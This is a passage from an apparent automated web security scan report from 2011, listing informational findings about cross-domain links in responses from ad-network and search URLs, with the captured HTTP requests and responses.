Cookie: bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:57 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=14400, post-check=28800, pre-check=14400
ETag: 854544
Vary: User-Agent, Accept-Language
Content-Length: 11862


// Firefox likes to mess with us and swap around / load the wrong contents in iframes.
// Reload the iframe using the src attribute if our code somehow gets swapped into an
// iframe that is not ours
...[SNIP]...
</a>"),
a=a.replace(/#(\w+)/g,"<a style='color: rgb(138, 151, 230); text-decoration:none' target='_blank' href='http://search.twitter.com/search?q=%23$1'>#$1</a>"),
a=a.replace(/@(\w+)/g,"<a style='color: rgb(138, 151, 230); text-decoration:none' target='_blank' href='http://twitter.com/$1'>@$1</a>
...[SNIP]...

17.62. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1063520%26id%3D1063519%26id%3D1273304%26id%3D730505%26id%3D733162%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEIKbrkCbjUisAXIkibQqPB0&cver=1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1063520%26id%3D1063519%26id%3D1273304%26id%3D730505%26id%3D733162%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:39:33 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 416
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEIKbrkCbjUisAXIkibQqPB0&amp;cver=1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1063520%26id%3D1063519%26id%3D1273304%26id%3D730505%26id%3D733162%26t%3D2">here</A>
...[SNIP]...

17.63. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=C3838ED1-0264-4F92-BB08-800A088CFCDE&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D67673251%26rk1%3D17154153%26rk2%3D1316239503.607%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEIKbrkCbjUisAXIkibQqPB0&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:30:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEIKbrkCbjUisAXIkibQqPB0&amp;cver=1">here</A>
...[SNIP]...

17.64. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=16233E2D-E708-4A27-9A6C-AFFA9B0751F6&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38484872%26rk1%3D72091245%26rk2%3D1316239534.984%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...

17.65. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html?click_url=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAWh0NO9zTsjyLbKGgALEnPHxBsXRq7cC_beIxzTAjbcBkMmHGhABGAEgy5WvEzgAUJGX3-j9_____wFgyQagAcvzheIDsgELd3d3LnRtei5jb226AQozMDB4MjUwX2FzyAEJ2gETaHR0cDovL3d3dy50bXouY29tL-ABArgCGMgCndDbHagDAegD-wPoA7gB9QMACACEoAYR%26num%3D1%26sig%3DAOD64_02j6kYV9LB8nl9oUrafQaSpBkj3Q%26client%3Dca-pub-7832112837345590%26adurl%3D HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316256809&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1316238807465&bpp=11&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316238804075&frm=4&adk=4076430307&ga_vid=1637260738.1316238804&ga_sid=1316238804&ga_hid=348414659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=2082&xpc=qU1fVHR0ss&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: text/html
Date: Sat, 17 Sep 2011 00:52:16 GMT
Server: Google Frontend
Content-Length: 15243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript">
</script>
...[SNIP]...
</div>
<a href="http://www.aionline.edu/privacy-policy/" target="_blank">Privacy Policy</a>
       <a href="http://www.aionline.edu/about-us/" target="_blank">About Us</a>
...[SNIP]...

17.66. http://dg.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.actvalue.com%2F&r=http%3A%2F%2Fwww.radius-server.net%2Faradial-radius-server-billing-partners-inner.html HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 16 Sep 2011 19:46:59 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript>
...[SNIP]...

17.67. http://duckduckgo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=imap+server HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:42:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Fri, 16 Sep 2011 19:42:05 GMT
Cache-Control: max-age=1
Content-Length: 9279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,nofollow"><meta http-equiv="content-type" content="text/html;
...[SNIP]...
<li><a href="http://donttrack.us/">DontTrack.us</a>
...[SNIP]...
<li><a href="http://dontbubble.us/">DontBubble.us</a>
...[SNIP]...
<li><a href="http://ye.gg/jabber">XMPP/Jabber</a>
...[SNIP]...
<li><a href="http://duck.co/">Forum</a></li><li><a href="http://webchat.freenode.net/?channels=duckduckgo">Chatroom</a>
...[SNIP]...
<li><a href="http://cafepress.com/duckduckgo">T-shirts</a>
...[SNIP]...
<h1> <a href="http://en.wikipedia.org/wiki/Internet_Message_Access_Protocol">Internet Message Access Protocol</a>
...[SNIP]...
<div id="a" class="cm ca2"><a class="cra" href="http://en.wikipedia.org/wiki/Internet_Message_Access_Protocol">Internet message access protocol is one of the two most prevalent Internet standard protocols for e-mail retrieval, the other being the Post Office Protocol.</a><div id="o"><a class="cra" href="http://en.wikipedia.org/wiki/Internet_Message_Access_Protocol"><img src="/i/en.wikipedia.org.ico" class="cia"></a><a class="le" href="http://en.wikipedia.org/wiki/Internet_Message_Access_Protocol">More at Wikipedia</a>
...[SNIP]...

17.68. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316257146&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2Freset-password%2F&dt=1316239146447&bpp=14&shv=r20110907&jsv=r20110914&correlator=1316239146489&frm=4&adk=1746254299&ga_vid=209760775.1316239147&ga_sid=1316239147&ga_hid=71756612&ga_fc=0&u_tz=-300&u_his=18&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1087&bih=870&eid=44901218%2C36887101&ref=http%3A%2F%2Fwww.tmz.com%2Fsignin%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=112&xpc=Ga6dAHrBqD&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:57:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 3933
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/reset-password/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFR10-9zREkfEkV8aaWuXF9uGDCgA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.69. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=240&slotname=3904971778&w=120&lmt=1316257659&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1366225%26srvc%3Dtrack%26position%3D2&dt=1316239657865&bpp=117&shv=r20110907&jsv=r20110914&prev_slotnames=8490313844&correlator=1316239657860&frm=4&adk=680252388&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1801771727&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=10&adx=880&ady=861&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=2658&xpc=EvIP2gdoPh&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:06:14 GMT
Server: cafe
Cache-Control: private
Content-Length: 7247
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/inside_track/view.bg%253Farticleid%253D1366225%2526srvc%253Dtrack%2526position%253D2%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Djcpenney.com/Back_To_School%26adT%3DJCPenney%25E2%2584%25A2%2BBack-to-School%26adU%3DArt-Schools.US.com%26adT%3DTop%2BFashion%2BColleges%26gl%3DUS&amp;usg=AFQjCNGM4YChCz7nmjZ9zhpbLJBPzc96VA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

17.70. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316256809&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1316238807465&bpp=11&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316238804075&frm=4&adk=4076430307&ga_vid=1637260738.1316238804&ga_sid=1316238804&ga_hid=348414659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=2082&xpc=qU1fVHR0ss&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:52:08 GMT
Server: cafe
Cache-Control: private
Content-Length: 3832
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEGC6Afh8lhANqfi9tFCbQAatdRqA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.71. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316257020&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&dt=1316239020413&bpp=15&shv=r20110907&jsv=r20110914&correlator=1316239020439&frm=4&adk=974859732&ga_vid=740357519.1316239021&ga_sid=1316239021&ga_hid=785573060&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=171&ady=8&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=179&xpc=3ntOAQLViT&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:58:29 GMT
Server: cafe
Cache-Control: private
Content-Length: 4163
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/%253Fadid%253Dhero2%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Facebook.com/BuxomCosmetics%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEl9QUKXCt_W63MQKYm1z_iuMi-Rg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.72. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257574&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Fentertainment%2F&dt=1316239573736&bpp=294&shv=r20110907&jsv=r20110914&correlator=1316239574040&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=921695896&ga_fc=1&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fbostonherald.com%2Fnews%2Fnational%2F%3Ftype%3Drem911&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=1972&xpc=NTXWQO6h4F&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:04:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 13372
X-XSS-Protection: 1; mode=block

